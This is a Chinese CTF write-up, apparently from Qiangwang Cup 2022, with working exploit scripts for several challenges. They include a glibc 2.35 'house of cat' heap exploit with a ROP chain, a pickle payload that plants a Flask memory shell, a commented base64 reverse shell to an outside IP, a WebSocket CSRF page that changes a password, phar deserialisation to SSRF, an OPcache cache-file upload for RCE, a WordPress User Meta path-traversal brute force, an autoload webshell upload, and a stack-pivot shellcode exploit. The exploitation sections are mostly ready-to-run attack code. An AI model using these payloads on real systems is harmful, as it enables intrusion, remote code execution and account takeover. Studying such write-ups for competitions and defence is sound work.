    # flag = "flag{79274530-bb31-4d35-8ddf-2210"
    # flag = "flag{79274530-bb31-4d35-8ddf-2210c9b"
    flag = ""
    # for i in range(len(flag)):
    #   print(i,flag[i])
    #   main(i,flag[i])
    # Brute force one position at a time: for each idx try every candidate
    # character; main() raising is taken as "wrong", a clean return as "right".
    # NOTE(review): the alphabet below has no 'l', 'g', '{' or '}', so the
    # "flag{" prefix seen in the commented-out partial flags cannot be found
    # by this loop as written — the author presumably resumed from a known
    # prefix by hand (see the commented lines).
    for idx in range(0,0x40):
        for char in "0123456789abcdef-_":
            try:
                main(idx, char)
                flag += char
                print(flag)
                #print(flag)
                print("-"*100)
                break
            except:
                # NOTE(review): a bare except also swallows KeyboardInterrupt,
                # and if remote() failed on the very first attempt `p` is not
                # bound yet, so p.close() would itself raise NameError here.
                p.close()

    # NOTE(review): if no candidate matched at some idx the loop just moves on,
    # so the printed flag can silently be shorter than 0x40 characters.
    print("flag:"+flag) 


house of cat

2.35
add 的 chunk 大小限制在 0x418 到 0x46f 之间,申请不到 tcache 大小的堆块。
delete 后存在 UAF,可以直接泄露出 libc,并劫持 stderr;
最后通过堆布局修改 top chunk size,触发 malloc assert 即可。

from pwn import *

#p = process('./cat')
# Remote target and the matching libc (2.35 per the note above); every offset
# below is relative to this particular libc build and pwntools' symbol table.
p = remote("47.94.166.51",35133)
libc = ELF('./libc.so.6')

#context.log_level = 'debug'
def dbg():
    """Attach gdb to the running target ``p`` (manual debugging hook)."""
    target = p
    gdb.attach(target)

def login():
    """Drain the banner, then send the fixed login line the service expects."""
    p.recv()
    login_line = "LOGIN | r00t QWBQWXF admin"
    p.send(login_line)

def ch(cmd):
    """Answer the menu prompt with the given choice number."""
    choice = str(cmd)
    p.sendlineafter('choice:\n', choice)

def add(idx,size,content):
    """Menu option 1: allocate chunk ``idx`` of ``size`` bytes filled with ``content``.

    Every menu action is preceded by the same command header the service
    requires before it shows the menu.
    """
    header = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
    p.send(header)
    ch(1)
    for prompt, value in (('idx:\n', idx), ('size:\n', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter('content:\n', str(content))

def free(idx):
    """Menu option 2: release chunk ``idx`` (the note above says the pointer survives, i.e. UAF)."""
    selection = str(idx)
    header = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
    p.send(header)
    ch(2)
    p.sendlineafter('idx:\n', selection)

def show(idx):
    """Menu option 3: dump chunk ``idx``; callers parse the 'Context:' output."""
    selection = str(idx)
    header = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
    p.send(header)
    ch(3)
    p.sendlineafter('idx:\n', selection)

def edit(idx,content):
    """Menu option 4: overwrite chunk ``idx`` with ``content`` (used on freed chunks below)."""
    selection = str(idx)
    header = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
    p.send(header)
    ch(4)
    p.sendlineafter('idx:\n', selection)
    p.sendafter('content:\n', str(content))


# Exploit script proper (runs at import).  Three stages, as the note above says:
#   1. leak libc and heap from a freed chunk via show() (the UAF read),
#   2. two large-bin writes through edit() on freed chunks, placing a heap
#      pointer at `target_addr` (first pointer_guard-0x20, then stderr-0x20),
#   3. corrupt a chunk size so the next allocation trips __malloc_assert,
#      which walks the fake stderr FILE and its vtable.
# Offsets are for this libc build only.
login()
add(0,0x428,'\x00'*0x30+'/flag') # p1
add(1,0x418,'B'*0x410) # g1
add(2,0x418,'CCC') # p2
add(3,0x438,'gap') # g2

free(0)
add(4,0x438,'aaa') # p1 goto large
free(2)

# stage 1: chunk 0 is freed but still readable; its fd/bk point into libc's
# large bin and its fd_nextsize into the heap.
show(0)
p.recvuntil('Context:\n')
libc_base = u64(p.recv(8)) -0x21a0d0
p.recv(8)
heap_addr = u64(p.recv(8))
large_bin = libc_base + 0x21a0d0

stderr = libc_base +0x21A860
tls_dtor_list = libc_base - 0x2898 -0x80 

pointer_guard  = libc_base  - 0x2898 + 0x8
#pointer_guard = libc_base + 0x6275e8 + 0x8
target_addr = pointer_guard-0x20
jumps = libc_base +  0x215b80
stdout = libc_base + libc.sym['_IO_2_1_stdout_']
next_chain = stdout
fake_guard = heap_addr + 0x850
pop_rdi = libc_base + 0x2a3e5
pop_rsi = libc_base + 0x02be51
pop_rax_rdx_rbx = libc_base + 0x90528
pop_rax = libc_base + 0xd7b55
syscall = libc_base + 0x91396
mov_rsp_rdx = libc_base + 0x5a170
magic_gadget = libc_base + 0x1675b0 # mov rdx, qword ptr [rdi + 8]; 

log.success('libc_base: '+hex(libc_base))
log.info('jumps: '+hex(jumps))
log.info('heap_addr: '+hex(heap_addr))
log.info('tls addr: '+hex(tls_dtor_list))
log.info('target_addr: '+hex(target_addr))
log.info('pointer addr: '+hex(pointer_guard))
log.info('stderr_addr: '+hex(stderr))

# stage 2a: rewrite the freed chunk's fd/bk/fd_nextsize/bk_nextsize so the
# next large-bin insertion writes a heap address to target_addr.
payload = p64(large_bin)*2 + p64(heap_addr) + p64(target_addr) 
edit(0,payload)

add(5,0x448,p64(0)) # p2 goto large

#clear large bin
# NOTE(review): this `payload` is never used — it is overwritten below before
# the next edit(); dead code.
payload = p64(large_bin)*2 + p64(heap_addr)*2


# Fake _IO_FILE that will sit where stderr is expected; offsets are the
# author's, the inline comments name the fields they believed they were setting.
fake_file = '\x00'*0x30
fake_file += '\x00'*0x28
fake_file += p64(next_chain)  # _chain
fake_file += '\x00'*0x18
fake_file += p64(heap_addr)  # _lock = writable address
fake_file += '\x00'*0x10
fake_file += p64(heap_addr)
fake_file +=  '\x00'*0x18
fake_file += p64(0x10000)
fake_file += p64(heap_addr +  0x1da0)
fake_file += '\x00'*0x8
fake_file += p64( jumps + 0x10)  # vtable
fake_file += p64(heap_addr +  0x1da0) + p64((magic_gadget^fake_guard)<<0x11) # 

# ROP chain: pivot, then close(0) / open / read / write / exit_group by raw
# syscall number (rax = 3, 2, 0, 1, 231).  The two lines tagged "#read" differ
# only in rax: the second one (rax=1) is write(1, buf, 0x30), not read.
rop = p64(pop_rax_rdx_rbx)
rop += p64(heap_addr+0x1da0) 
rop += p64(heap_addr+0x1e00) # fake_rdx
rop += p64(heap_addr+0x1da0) 
rop += p64(mov_rsp_rdx)
rop += p64(mov_rsp_rdx) #
rop += p64(mov_rsp_rdx) #rdx+0x20
rop += p64(mov_rsp_rdx)
rop += p64(0)*4
rop += p64(pop_rax)+p64(3)+p64(pop_rdi)+p64(0)+p64(syscall) #close(0)
rop += p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(heap_addr+0x40)+p64(pop_rsi)+p64(0)+p64(syscall)#open
rop += p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(heap_addr+0x200)+p64(pop_rax_rdx_rbx)+p64(0)+p64(0x30)+p64(0)+p64(syscall)#read
rop += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(heap_addr+0x200)+p64(pop_rax_rdx_rbx)+p64(1)+p64(0x30)+p64(0)+p64(syscall)#read
rop += p64(pop_rax_rdx_rbx)+p64(231)+p64(0)+p64(0)+p64(pop_rdi)+p64(0)+p64(syscall)
# NOTE(review): bare expression, result discarded — leftover from a REPL check.
hex(len(rop))

add(6,0x448,'666') # p1 
add(7,0x438,rop ) # g1
add(8,0x438, fake_file ) # p2
add(9,0x438,'999') # g2

free(6)
add(10,0x458,'\x0a\x0a\x0a') # p1 goto large
free(8)

# stage 2b: same leak/rewrite dance on chunk 6, now aimed at stderr-0x20.
show(6)
p.recvuntil('Context:\n')
large_bin = u64(p.recv(8))
p.recv(8)
heap_addr = u64(p.recv(8))
target_addr = stderr - 0x20

log.info('heap_addr: '+hex(heap_addr))

payload = p64(large_bin)*2 + p64(heap_addr) + p64(target_addr) 
edit(6,payload)

add(11,0x468,'\x0b\x0b\x0b') #p2 goto large  
add(12,0x450,p64(0)+p64(0x21)+'a'*0x10+p64(0)+p64(0x21))

# x/30gx $rebase(0x4060)
# stage 3: reshuffle chunks and overwrite a size field (0x481) through an
# oversized write; free(11) is issued twice here, which only works because
# free() leaves the pointer in place.
free(12)
free(11)
free(10)
add(13,0x468,'k'*0x450+p64(0)+p64(0x481) )
free(11)
add(14,0x468,'aa')
log.info('magic_gadget: '+hex(magic_gadget)) 
#dbg()# b*$rebase(0x0177F) b __vfxprintf b *__malloc_assert+78 b*__vfxprintf+76 b*fflush+192

# trigger malloc_assert
# Deliberately not using add(): the content prompt never comes because the
# allocation aborts inside malloc and stderr is already hijacked.
payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
p.send(payload)
ch(1)
p.sendlineafter('idx:\n',str(15))
p.sendlineafter('size:\n',str(0x468))


p.interactive()

web

crash

pickle反序列化
通过 i 操作码执行命令 -> 让 flask sleep -> nginx 返回 504
环境有问题
直接命令执行 sleep,时间久了环境会挂;
改为写一个内存马,再通过它执行 sleep 居然就可以了。

import base64
import pickletools
# Builds the pickle for the deserialisation endpoint described above.
# Only the LAST assignment to `cmd` and to `payload_byte` is live; every
# earlier one is a superseded attempt left in place as a record.
cmd = b'''python -c exec('YmFzaCAtaSAmPiAvZGV2L3RjcC8xNTAuMTU4LjE3Mi4xODIvNzc3NyAwPCYx'.decode('base64'))'''
cmd = b'''sleep 70'''
# live `cmd`: Python source that registers a /shell123 route on the Flask app
# (the "memory shell" the note above refers to).
cmd = b'''app.add_url_rule('/shell123', 'shell123', lambda: __import__('os').popen(request.args.get('cmd', 'whoami')).read())'''
# NOTE(review): cmd_len is the *text* "\x73", not the byte 0x73, so it cannot
# be concatenated into the pickle; it is only printed, and the value is then
# hard-coded as the BINUNICODE length byte in the live payload below.
cmd_len = str(hex(len(cmd))).replace("0x",r"\x").encode()
print(cmd_len)
# print(b'\x80\x03c__main__\nadmin\n}(X'+cmd_len + b'\x00\x00\x00'+cmd+b'ios\nsystem\n.')
# payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x2d\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x30\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\xe9\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x61\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x08\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x24\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x23\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(ctime\nsleep\nI70\no.')
payload_byte = (b'\x80\x03capp\nadmin\n}(ctime\nsleep\nI70\no.')
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x09\x00\x00\x00'+cmd+b'ibuiltins\neval\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x0a\x00\x00\x00'+cmd+b'ibuiltins\neval\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x3e\x00\x00\x00'+cmd+b'ibuiltins\neval\n.')
# Live payload.  Opcodes: PROTO 3; GLOBAL app.admin; EMPTY_DICT; MARK;
# BINUNICODE with length 0x73 (= 115 = len(cmd) above); INST builtins.eval,
# which imports builtins.eval and calls it with everything pushed since the
# MARK, i.e. eval(cmd); STOP.  The GLOBAL/INST opcodes are why unpickling
# client-supplied bytes is code execution; server-side, restricting
# Unpickler.find_class or not using pickle for untrusted data is the fix.
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x73\x00\x00\x00'+cmd+b'ibuiltins\neval\n.')
payload = pickletools.optimize(payload_byte)
print(str(base64.b64encode(payload), encoding='utf-8'))
GET /shell123?cmd=sleep+50 HTTP/1.1
Host: 123.56.86.227:39489
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


babyweb

修改 admin 的密码为 123456;hint 给了源码,Python 和 Go 处理 JSON 的方式不同造成逻辑漏洞。

<script>
        // One shared socket.  The URL points at loopback, so this page only has
        // an effect when it is loaded by the bot's own browser (the "bot" the
        // note above talks about).
        var ws = null;
        var url = "ws://127.0.0.1:8888/bot";
        // First call opens the socket and, as soon as it is open, sends the
        // password-change command with no user interaction; later calls (none
        // in this page) would forward the sendbox contents instead.
        // NOTE(review): a page served from another origin can only drive this
        // endpoint if the bot's WebSocket server does not validate the Origin
        // header of the handshake — checking it (or requiring a token) on the
        // server side is the mitigation this page demonstrates the need for.
        function sendtobot() {
            if (ws) {
                var msg = document.getElementById("sendbox").value;
                ws.send(msg);
                document.getElementById("sendbox").value = "";
                document.getElementById("chatbox").append("你: " + msg + "\r\n");
            }
            else{
                ws = new WebSocket(url);
                ws.onopen = function (event) {
                    console.log('connection open!')
                    // window.open() of a relative URL — presumably a visible
                    // marker that the socket connected; TODO confirm intent.
                    open("./connection open!")
                    var msg = "changepw 123456";
                    ws.send(msg);
                    document.getElementById("sendbox").value = "";
                    document.getElementById("chatbox").append("你: " + msg + "\r\n");
                }
                ws.onmessage = function (ev) {
                    botsay(ev.data);
                };
                ws.onerror = function () {
                    console.log("connection error");
                };
                ws.onclose = function () {
                    console.log("connection close!");
                };

            }
        }
        // Close the shared socket if one is open and forget it.
        function closeWebSocket() {
            if (!ws) {
                return;
            }
            ws.close();
            ws = null;
        }
        // Append one line from the bot to the chat log.
        function botsay(content) {
            var line = "bot: " + content + "\r\n";
            document.getElementById("chatbox").append(line);
        }
        // Fire immediately on load — no click is required.
        sendtobot()
    </script>

post发包刷钱买flag

{"product":[{"id":1, "num" :0}, {"id":2, "num" :0}, {"id":1,
" num" :-11000}], " product":[{"id":1, "num":0}, {"id":2, "num"
:0}]}

easyweb

绕 session 上传,phar 反序列化,再用 curl SSRF 打内网。
flag在 10.10.10.10:80 上
exp.py

from hashlib import sha1
import os
import requests
import base64
import time
# Template PHP source (classser.php, shown further down); fuzz() substitutes
# the "{{code}}" placeholder before running it.
phpcode = ""
with open("classser.php","r") as f:
    phpcode = f.read()
def fuzz(payload):
    """Generate a phar carrying the given URL, upload it, trigger it, print the result.

    Steps visible below: render the PHP template with ``payload``, run it with
    the local php CLI to produce phar.phar, patch the serialized metadata and
    re-sign the archive, upload it as a .jpg, then request showfile.php with a
    phar:// path and decode the base64 <img> the target echoes back.
    """
    print(payload)
    phpcodefuzz = phpcode.replace("{{code}}",payload)
    # NOTE(review): this GET's response is never used (r is rebound below).
    r = requests.get("http://47.104.95.124:8080/")
    with open("tmp.php","w") as f:
        f.write(phpcodefuzz)
    # The CLI script echoes serialize($o); that text is discarded here (text is
    # rebound below) — the phar file on disk is what matters.
    text = os.popen("php tmp.php").read()
    time.sleep(1)
    f = open("phar.phar", "rb")
    dataa = f.read()
    f.close()
    # Bump the serialized property count of AdminShow; presumably so that
    # __wakeup() (which resets schema/source) does not run on the target.
    # A phar's metadata is covered by the archive signature, so it is re-signed:
    file = dataa.replace(b'"AdminShow":4',b'"AdminShow":5')
    text = file[:-28]  # everything except the trailing signature block
    last = file[-8:]   # last 8 bytes: signature flags + "GBMB" magic
    new_file = text+sha1(text).digest() + last  # rebuild with a SHA-1 that matches the edited body
    urll = "http://47.104.95.124:8080/upload.php"
    # NOTE(review): burp_proxy is defined but never passed to requests.
    burp_proxy = {
        "http":"http://127.0.0.1:8080"
    }
    cooo = {
        "PHPSESSID":"a"
    }
    filee = {'file': ('newwwa.jpg', new_file, 'image/png')}
    dataa = {
        "PHP_SESSION_UPLOAD_PROGRESS":"123"
    }
    r = requests.post(url=urll,data=dataa,files=filee,cookies=cooo)
    filename = r.text[r.text.index("./")+2:r.text.index(" suc")]
    # NOTE(review): this f-string has no {...} placeholder (it reads "(unknown)"
    # where the uploaded file name presumably belonged), so `filename` above is
    # computed but never used — TODO confirm against the original script.
    file_unse = f"http://47.104.95.124:8080/showfile.php?f=phar://(unknown)/demo"
    r = requests.get(url=file_unse)
    # print(r.text)
    # Parse the base64 body out of the <img> tag GuestShow::show() emits.
    base = r.text[r.text.index("<img src=data:jpg;base64,")+len('<img src=data:jpg;base64,'):r.text.index(" /><img src=data:jpg;base64, />")]
    print(base64.b64decode(base).decode())
    with open("asd.html",'w+') as f:
        f.write(base64.b64decode(base).decode())
# The condition is constant-false, so only the else branch ever runs; the
# first call is kept as a disabled alternative (a local log file).
if 2 == 1 :
    fuzz("file:///var/log/apache/access.log")
else:
    fuzz("http://10.10.10.10:80/?url=file:///flag")

反序列化classser.php

<?php
// phar.readonly is On by default; it must be off for this CLI script to write phar.phar.
ini_set('phar.readonly',0);
/**
 * Presumably mirrors the target's GuestShow class so that serialize($o) below
 * yields metadata the target unserializes into the same class (target source
 * is not on this page — confirm).
 *
 * $file holds an AdminShow instance (set in the constructor), not a path string.
 */
class GuestShow{
    public $file;
    public $contents;
    public function __construct($file)
    {

        $this->file=new AdminShow($file);
    }
    // Reads $this->file->name; AdminShow declares no `name` property, so this
    // goes through AdminShow::__get, which calls show() before returning.
    function __toString(){
        $str = $this->file->name;
        return "";
    }
    function __get($value){
        return $this->$value;
    }
    // file_get_contents() receives $this->file; an object there is converted
    // through its __toString.
    function show()
    {
        $this->contents = file_get_contents($this->file);
        $src = "data:jpg;base64,".base64_encode($this->contents);
        echo "<img src={$src} />";
    }
    // echo $this invokes GuestShow::__toString when the object is destroyed.
    function __destruct(){
        echo $this;
    }
}


/**
 * Presumably mirrors the target's AdminShow class (declared properties:
 * source, str, filter). `schema` is not declared; it is created dynamically
 * through __set in the constructor.
 */
class AdminShow{
    public $source;
    public $str;
    public $filter;
    public function __construct($file)
    {
        $this->source = '';
        $this->schema = $file;  // undeclared property: this assignment goes through __set
    }
    // Reads ->source / ->schema of whatever objects sit in $this->str[0] and $this->str[1];
    // only the second value is returned.
    public function __toString()
    {
        $content = $this->str[0]->source;
        $content = $this->str[1]->schema;
        return $content;
    }
    // Any read of an undeclared/inaccessible property runs show() before returning it.
    public function __get($value){
        $this->show();
        return $this->$value;
    }
    public function __set($key,$value){
        $this->$key = $value;
    }
    // Rejects a source matching /usr|auto|log/i, then builds schema . source;
    // $url is assigned but not used inside this method.
    public function show(){
        if(preg_match('/usr|auto|log/i' , $this->source))
        {
            die("error");
        }
        $url = $this->schema . $this->source;
    }
    // Resets schema and source to fixed values whenever an instance is unserialized.
    public function __wakeup()
    {
        if ($this->schema !== 'file:///var/www/html/') {
            $this->schema = 'file:///var/www/html/';
        }
        if ($this->source !== 'admin.png') {
            $this->source = 'admin.png';
        }
    }
}
// Build phar.phar with a minimal stub, the serialized GuestShow as metadata,
// and one dummy entry; serialize() output is echoed for inspection.
$archive = new Phar("phar.phar");
$archive->startBuffering();
$archive->setStub("<?php __HALT_COMPILER(); ?>");
$payload = new GuestShow("{{code}}");
echo serialize($payload);
$archive->setMetadata($payload);
$archive->addFromString("test.txt", "test");
$archive->stopBuffering();

uploadpro

/phpinfo.php
开了OPcache拓展
可以上传bin…
http://eci.ichunqiu.com/uploads../
目录穿越读文件读一下源码可以跨目录上传
先读index.php.bin获取时间戳
然后自己构造 phpinfo.php.bin 上传来 RCE（用 010 Editor 改时间戳）
可以重放容器
内存缓存,上传前先不要访问phpinfo.php
docker起一个php:7.4.3-apache
改改配置和题目相同

docker run -itd -p 11015:80 -v ./ss:/var/www/html php:7.4.3-apache
opcache.consistency_checks=0
opcache.dups_fix=Off
opcache.enable=On
opcache.enable_cli=On
opcache.enable_file_override=Off
opcache.file_cache=/tmp/opcache
opcache.file_cache_consistency_checks=1
opcache.file_cache_only=0
opcache.file_update_protection=2
opcache.force_restart_timeout=180
opcache.huge_code_pages=Off
opcache.interned_strings_buffer=8
opcache.lockfile_path=/tmp
opcache.log_verbosity_level=1
opcache.max_accelerated_files=10000
opcache.max_file_size=0
opcache.max_wasted_percentage=5
opcache.memory_consumption=128
opcache.opt_debug_level=0
opcache.optimization_level=0x7FFEBFFF
opcache.protect_memory=0
opcache.revalidate_freq=2
opcache.revalidate_path=Off
opcache.save_comments=1
opcache.use_cwd=On
opcache.validate_permission=Off
opcache.validate_root=Off
opcache.validate_timestamps=On

exp.py

#!/usr/bin/python3
import requests
import os

urll = "http://url/"  # placeholder target base URL
datad = None
# OPcache file-cache entry for phpinfo.php generated in the local php:7.4.3-apache
# container described above (timestamp already adjusted to match the target).
with open('/home/ubuntu/test/ss/phpinfo.php.bin', 'rb') as f:
    datad = f.read()
filess = {'file': ('phpinfo.php.bin', datad, 'image/png')}
# `prefix` is presumably joined server-side into the stored path; the ../ run walks
# out of the upload directory into the opcache.file_cache tree for /var/www/html/.
r = requests.post(url=urll+"index.php?prefix=../../../../../../tmp/opcache/a06090313e406ccd069625aabb3cded7/var/www/html/",files=filess)
# print(r.text)
# print(r.content)
# Read the stored file back through the uploads../ traversal and confirm it is byte-identical.
r = requests.get(url=urll+"uploads../tmp/opcache/a06090313e406ccd069625aabb3cded7/var/www/html/phpinfo.php.bin")
print(r.content==datad)

强网先锋

WP-UM

根据题目来的话就是User Meta这个插件了
User Meta:2.4.3
https://wpscan.com/vulnerability/9d4a3f09-b011-4d87-ab63-332e505cf1cd
pf-nonce 去 http://eci-2zea7reemywzfen5krqa.cloudeci1.ichunqiu.com/index.php/login/ 页面f12刷一个pf_nonce

import requests
import string

burp0_url = "http://url:80/wp-admin/admin-ajax.php"  # placeholder host
burp0_cookies = {
    "Hm_lvt_2d0601bd28de7d49818249cf35d95943": "1653791821,1655028229,1655379686,1655471106"}
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
print(string.ascii_letters)
# Characters recovered so far; the second assignment overrides the first.
res = "MaoGePaMao"
res = "MaoGeYaoQiFeiLa"
# One character at a time: `i` is the position (only 15 in this run), `j` the candidate.
for i in range(15,16):
    for j in string.ascii_letters:
        # filename = "username/"+str(i)+j
        filename = "password/"+str(i)+j
        print(filename)
        # um_show_uploaded_file with a traversal `filepath` (User Meta 2.4.3, wpscan advisory linked above);
        # pf_nonce must be refreshed from the login page as noted above.
        burp0_data = {"field_name": "test", "filepath": 
        "/../../../../../../../../"+filename, 
        "field_id": "um_field_4",
                    "form_key": "Upload", "action": "um_show_uploaded_file", "pf_nonce": "39a16c8deb", "is_ajax": "true"}
        r = requests.post(burp0_url, headers=burp0_headers,
                    cookies=burp0_cookies, data=burp0_data)
        # A response containing "um_remove_file" is taken as a hit: keep the character and stop.
        if "um_remove_file" in r.text:
            res += j
            print(res)
            break

爆密码 登上后台写马
cat /usr/local/This_1s_secert

rcefile

spl_autoload_register
文件和inc类同名

import requests
import time
import hashlib
import re
proxies = {"http":"http://127.0.0.1:8080"}  # route through a local intercepting proxy
for i in range(1):  # single iteration; the loop exists only to re-run easily
    # print(time.time())
    # Class name = md5 of the current Unix time in seconds; the server-side file name is
    # presumably derived the same way, which the comparison at the end checks.
    timeee = str(int(time.time()))
    # print(int(time.time()))
    # print(timeee)
    # print(timeee.encode())
    h = hashlib.md5()
    h.update(timeee.encode())
    md5name = h.hexdigest()
    print(md5name)


    burp0_url = "http://eci-2zefnon2z47gzey5f58s.cloudeci1.ichunqiu.com/upload.php"
    burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                    "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx6dML4ocEqShnX50"}
    # Raw multipart body: uploads popko3.inc declaring a class named <md5name>
    # (the .inc file name matching the class name is what spl_autoload_register picks up, per the note above).
    burp0_data = "------WebKitFormBoundaryx6dML4ocEqShnX50\r\nContent-Disposition: form-data; name=\"file\"; filename=\"popko3.inc\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\nclass " + \
        md5name + \
        "{\r\n\tfunction __wakeup()\r\n    {\r\n           system($_GET[1]);\r\n    }\r\n}\r\n------WebKitFormBoundaryx6dML4ocEqShnX50--\r\n"
    r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxies)
    # The server reports the stored name as "file: <name>.inc"; `results` is None
    # (and group() raises) if that text is missing from the response.
    results = re.search(r"file: (.*)\.inc", r.text)
    # print()
    # print(r.text)
    print(results.group(1))
    print(md5name == results.group(1))  # True only if local and server timestamps agreed
GET /showfile.php?1=cat+/flag HTTP/1.1
Host: eci-2zefnon2z47gzey5f58s.cloudeci1.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2zefnon2z47gzey5f58s.cloudeci1.ichunqiu.com/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1653791821,1655028229,1655379686,1655471106; userfile=O:32:"cdf056f0b857b3651ce22a891cfa7599":0:{}
Connection: close

polydiv

sage: P.<x> = GF(2)[]
sage: r = x^14 + x^12 + x^10 + x^8 + x^6 + x^5 + x^4 + x^2 + 1
....: a = x^7 + x^6 + x^3 + x + 1
....: c = x^6 + x^2
sage: (r-c)/a
x^7 + x^6 + x^2 + x + 1

ASR

分解 n，在各个有限域上开根，再用中国剩余定理合并

sage: p1 = 218566259296037866647273372633238739089
sage: p2 = 260594583349478633632570848336184053653
sage: p3 = 225933944608558304529179430753170813347
sage: p4 = 223213222467584072959434495118689164399
sage: n == (p1*p2*p3*p4)^2
True
sage: P.<m> = PolynomialRing(Zmod(p1),implementation='NTL')
....: f = m^e-c
....: roots1 = [r[0] for r in f.monic().roots()]
....: P.<m> = PolynomialRing(Zmod(p2),implementation='NTL')
....: f = m^e-c
....: roots2 = [r[0] for r in f.monic().roots()]
....: P.<m> = PolynomialRing(Zmod(p3),implementation='NTL')
....: f = m^e-c
....: roots3 = [r[0] for r in f.monic().roots()]
....: P.<m> = PolynomialRing(Zmod(p4),implementation='NTL')
....: f = m^e-c
....: roots4 = [r[0] for r in f.monic().roots()]
sage: for r1 in roots1:
....:     for r2 in roots2:
....:         for r3 in roots3:
....:             for r4 in roots4:
....:                 res = long_to_bytes(crt([ZZ(r1), ZZ(r2), ZZ(r3), ZZ(r4)], [p1, p2, p3, p4]))
....:                 if b'flag{' in res:
....:                     print(res)
....:
b'flag{Fear_can_hold_you_prisoner_Hope_can_set_you_free}\x06\x06\x06\x06\x06\x06'

devnull

栈迁移。最后的输出 'Thanks\x0a' 刚好能让 rdx 变为 7，所以利用 mprotect 的 gadget 使程序段变为可读可写可执行，最后执行 shellcode

```python

from pwn import *

context.arch = 'amd64'

# p = process("./devnull")

p = remote("59.110.212.61",26182)

context.terminal = ['tmux', 'splitw', '-h']

# gdb.attach(p,"b *0x401436")

p.recvuntil("please input your filename\n")
p.sendline("A"*0x1f)

fake_buf = 0x3fe000
leave_ret = 0x0401511

# 0x0000000000401350: mov rax, qword ptr [rbp - 0x18]; leave; ret;

mov_rax_leave_ret = 0x0000000000401350

p.recvuntil("Please write the data you want to discard\n")
p.send(b"A"*0x14+p64(fake_buf)+p64(fake_buf)+p64(leave_ret))

p.recvuntil("please input your new data\n")

rop_chain = p64(fake_buf+0x10+0x18) + p64(mov_rax_leave_ret)
rop_chain += p64(fake_buf)
rop_chain += p64(0xcafe)*2
rop_chain += p64(fake_buf+0x100) + p64(0x4012D0)

rop_chain += p64(fake_buf+0x48)*2

# >>> asm('mov rsi,rdi;xor rdi,rdi;mov rdx,r11;syscall').encode('hex')

# '4889fe4831ff4c89da0f05'

rop_chain += b''.fromhex('4889fe4831ff4c89da0f05')

p.send(rop_chain)

p.recvuntil('Thanks')

p.send(b'\x90'*0x70+asm(shellcraft.sh()))

p.interactive()

```

拿到 shell 后，还要执行 `exec >&2`，这样就可以通过标准错误流输出了
